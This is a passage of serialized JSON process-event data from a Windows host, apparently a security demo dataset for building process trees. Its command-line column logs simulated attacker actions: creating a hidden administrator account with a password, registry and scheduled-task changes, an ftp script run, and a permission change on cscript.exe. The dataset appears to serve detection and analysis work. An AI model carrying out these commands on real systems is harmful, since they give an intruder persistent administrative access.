3a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\"],\"SubjectDomainName\":[\"NaN\",\"WORKGROUP\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"WORKGROUP\"],\"SubjectLogonId\":[\"0x3e7\",\"0x3e7\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x3e7\"],\"SubjectUserName\":[\"NaN\",\"BlackHatDemoHos$\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"timvic\",\"BlackHatDemoHos$\"],\"SubjectUserSid\":[\"NaN\",\"S-1-5-18\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-21-3334416894-4278249820-3875274378-1006\",\"S-1-5-18\"],\"TargetLogonId\":[\"NaN\",\"0x136fc6\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\"],\"TenantId\":[\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\"],\"TimeCreatedUtc\":[\"NaN\",1594405673417.0,1594405673487.0,1594405693180.0,1594405693657.0,1594405694043.0,1594405694063.0,1594405694060.0,1594405694067.0,1594405694083.0,1594405694100.0,1594405694123.0,1594405694137.0,1594405713577.0,1594405727377.0,1594405727387.0,1594405727407.0,1594405727417.0,1594405727440.0,1594405727453.0,1594405727443.0,1594405727480.0,1594405727489.9998,1594405727517.0,1594405727537.0,1594405727517.0,1594405727563.0,1594405727569.9998,1594405727593.0,1594405727603.0,1594405727627.0,1594405727637.0,1594405727660.0,1594405727700.0,1594405727740.0,1594405727830.0002,1594406259449.9998,1594406259467.0,1594406259497.0,1594406259510.0002,1594406259529.9998,1594406259543.0,1594406259567.0,1594405713693.0,1594405726953.0,1594405726973.0,1594405726993.0,1594405727080.0,1594405727233.0,1594405727270.0002,1594405727343.0,1594405727273.0,1594410259440.0],\"TimeGenerated\":{\"__ndarray__\":\"AAAAAAAAAAAAkJy9nzN3QgDwoL2fM3dCAMBvwp8zd0IAkI3CnzN3QgCwpcKfM3dCAPCmwp8zd0IAwKbCnzN3QgAwp8KfM3dCADCowp8zd0IAQKnCnzN3QgCwqsKfM3dCAJCrwp8zd0IAkGrHnzN3QgAQycqfM3dCALDJyp8zd0IA8MrKnzN3QgCQy8qfM3dCAADNyp8zd0IA0M3KnzN3QgAwzcqfM3dCAIDPyp8zd0IAINDKnzN3QgDQ0cqfM3dCABDTyp8zd0IA0NHKnzN3QgCw1MqfM3dCACDVyp8zd0IAkNbKnzN3QgAw18qfM3dCALDYyp8zd0IAUNnKnzN3QgDA2sqfM3dCAEDdyp8zd0IAwN/KnzN3QgBg5cqfM3dCAKCvTKAzd0IAsLBMoDN3QgCQskygM3dCAGCzTKAzd0IAoLRMoDN3QgBwtUygM3dCAPC2TKAzd0IA0HHHnzN3QgCQrsqfM3dCANCvyp8zd0IAELHKnzN3QgCAtsqfM3dCABDAyp8zd0IAYMLKnzN3QgDwxsqfM3dCAJDCyp8zd0IAAD8dpDN3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[53]},\"TimeGenerated_orig_par\":[\"NaN\",0.0,1594405673417.0,1594405673487.0,1594405673487.0,1594405673487.0,1594405694043.0,1594405673487.0,1594405694060.0,1594405673487.0,1594405694083.0,1594405673487.0,1594405694123.0,1594405673487.0,1594405713577.0,1594405727377.0,1594405713577.0,1594405727407.0,1594405713577.0,1594405727440.0,1594405713577.0,1594405713577.0,1594405727480.0,1594405713577.0,1594405727517.0,1594405713577.0,1594405713577.0,1594405727563.0,1594405713577.0,1594405727593.0,1594405713577.0,1594405727627.0,1594405713577.0,1594405713577.0,1594405713577.0,1594405713577.0,1594405713577.0,1594406259449.9998,1594405713577.0,1594406259497.0,1594405713577.0,1594406259529.9998,1594405713577.0,1594405713577.0,1594405713577.0,1594405713577.0,1594405713577.0,1594405713577.0,1594405713577.0,1594405713577.0,1594405727270.0002,1594405713577.0,0.0],\"TokenElevationType\":[\"NaN\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1938\",\"%%1936\"],\"cmd\":[\"cmdline unknown\",\"C:\\\\windows\\\\system32\\\\userinit.exe\",\"C:\\\\windows\\\\Explorer.EXE\",\"\\\"C:\\\\Windows\\\\System32\\\\SecurityHealthSystray.exe\\\" \",\"\\\"C:\\\\Users\\\\timvic\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive...\",\"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" /q /c del /q \\\"C:\\\\Users\\\\timvi...\",\"\\\\??\\\\C:\\\\windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" /q /c del /q \\\"C:\\\\Users\\\\timvi...\",\"\\\\??\\\\C:\\\\windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" /q /c rmdir /s /q \\\"C:\\\\Users\\\\...\",\"\\\\??\\\\C:\\\\windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" /q /c rmdir /s /q \\\"C:\\\\Users\\\\...\",\"\\\\??\\\\C:\\\\windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\windows\\\\system32\\\\cmd.exe\\\" \",\"net  user abai$ Wf9k44_9d[=$ /add\",\"C:\\\\windows\\\\system32\\\\net1  user abai$ Wf9k44_9d[=$ /add\",\"net  user abai$ Wf9k44_9d[=$\",\"C:\\\\windows\\\\system32\\\\net1  user abai$ Wf9k44_9d[=$\",\"net  localgroup administrators \",\"C:\\\\windows\\\\system32\\\\net1  localgroup administrators \",\"findstr  \\\"abai$\\\"\",\"net  localgroup administrators abai$ /add\",\"C:\\\\windows\\\\system32\\\\net1  localgroup administrators abai$ ...\",\"net  users \",\"C:\\\\windows\\\\system32\\\\net1  users \",\"findstr  \\\"secure-ssl-sec.com\\\"\",\"net  user faxing-mon.best Wf9k44_9d[=$ /add\",\"C:\\\\windows\\\\system32\\\\net1  user faxing-mon.best Wf9k44_9d[=...\",\"net  user secure-ssl-sec.com Wf9k44_sinc9d3[=$\",\"C:\\\\windows\\\\system32\\\\net1  user secure-ssl-sec.com Wf9k44_s...\",\"net  user secure-ssl-sec.com /active:yes\",\"C:\\\\windows\\\\system32\\\\net1  user secure-ssl-sec.com /active:...\",\"cmd  /c echo QWxsIHlvdXIgc2VydmVycyBiZWxvbmcgdG8gZmF4aW5nL...\",\"reg  ADD \\\"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal S...\",\"schtasks.exe  /create /tn  /tr \\\"c:\\\\pagefile.exe /?\\\" /sc ho...\",\"ping  32.220.60.108 -n 100 \",\"net  localgroup administrators abai$ /delete\",\"C:\\\\windows\\\\system32\\\\net1  localgroup administrators abai$ ...\",\"net  user abai$ /delete\",\"C:\\\\windows\\\\system32\\\\net1  user abai$ /delete\",\"net  user faxing-mon.best /delete\",\"C:\\\\windows\\\\system32\\\\net1  user faxing-mon.best /delete\",\"cmd  /c echo End Security Demo tasks\",\"\\\\??\\\\C:\\\\windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Begin Security Demo tasks\",\"cmd  /c echo Any questions about the commands executed her...\",\"cmd  /c echo timb@microsoft.com; ianhelle@microsoft.com; s...\",\"ftp  -s:MG06.dll\",\"cacls.exe  C:\\\\Windows\\\\system32\\\\cscript.exe /e /t /g SYSTEM...\",\"net  users \",\"C:\\\\windows\\\\system32\\\\net1  users \",\"findstr  \\\"abai$\\\"\",\"\\\"LogonUI.exe\\\" /flags:0x0 /state0:0xa3c7e055 /state1:0x41c6...\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52],\"new_process_lc\":[\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\userinit.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\securityhealthsystray.exe\",\"c:\\\\users\\\\timvic\\\\appdata\\\\local\\\\microsoft\\\\onedrive\\\\onedrive.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\findstr.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\findstr.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\w!ndows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\schtasks.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ftp.exe\",\"c:\\\\w!ndows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\findstr.exe\",\"c:\\\\windows\\\\system32\\\\logonui.exe\"],\"new_process_lc_par\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\userinit.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\"],\"parent_index\":[\"NaN\",\"1156\",\"20\",\"21\",\"21\",\"21\",\"64\",\"21\",\"65\",\"21\",\"68\",\"21\",\"70\",\"21\",\"89\",\"100\",\"89\",\"102\",\"89\",\"104\",\"89\",\"89\",\"107\",\"89\",\"109\",\"89\",\"89\",\"112\",\"89\",\"114\",\"89\",\"116\",\"89\",\"89\",\"89\",\"89\",\"89\",\"647\",\"89\",\"649\",\"89\",\"651\",\"89\",\"89\",\"89\",\"89\",\"89\",\"89\",\"89\",\"89\",\"97\",\"89\",\"1156\"],\"parent_key\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\winlogon.exe0x60c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\userinit.exe0x19682020-07-10 18:27:53.417000\",\"c:\\\\windows\\\\explorer.exe0x19a02020-07-10 18:27:53.487000\",\"c:\\\\windows\\\\explorer.exe0x19a02020-07-10 18:27:53.487000\",\"c:\\\\windows\\\\explorer.exe0x19a02020-07-10 18:27:53.487000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x24142020-07-10 18:28:14.043000\",\"c:\\\\windows\\\\explorer.exe0x19a02020-07-10 18:27:53.487000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x241c2020-07-10 18:28:14.060000\",\"c:\\\\windows\\\\explorer.exe0x19a02020-07-10 18:27:53.487000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x24402020-07-10 18:28:14.083000\",\"c:\\\\windows\\\\explorer.exe0x19a02020-07-10 18:27:53.487000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x246c2020-07-10 18:28:14.123000\",\"c:\\\\windows\\\\explorer.exe0x19a02020-07-10 18:27:53.487000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\net.exe0x24182020-07-10 18:28:47.377000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\net.exe0x24902020-07-10 18:28:47.407000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\net.exe0x21182020-07-10 18:28:47.440000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\net.exe0x26842020-07-10 18:28:47.480000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\net.exe0x227c2020-07-10 18:28:47.517000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\net.exe0x1d942020-07-10 18:28:47.563000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\net.exe0x146c2020-07-10 18:28:47.593000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\net.exe0x230c2020-07-10 18:28:47.627000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\net.exe0x22c02020-07-10 18:37:39.450000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\net.exe0x93c2020-07-10 18:37:39.497000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\net.exe0x24882020-07-10 18:37:39.530000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 18:28:33.577000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21ec2020-07-10 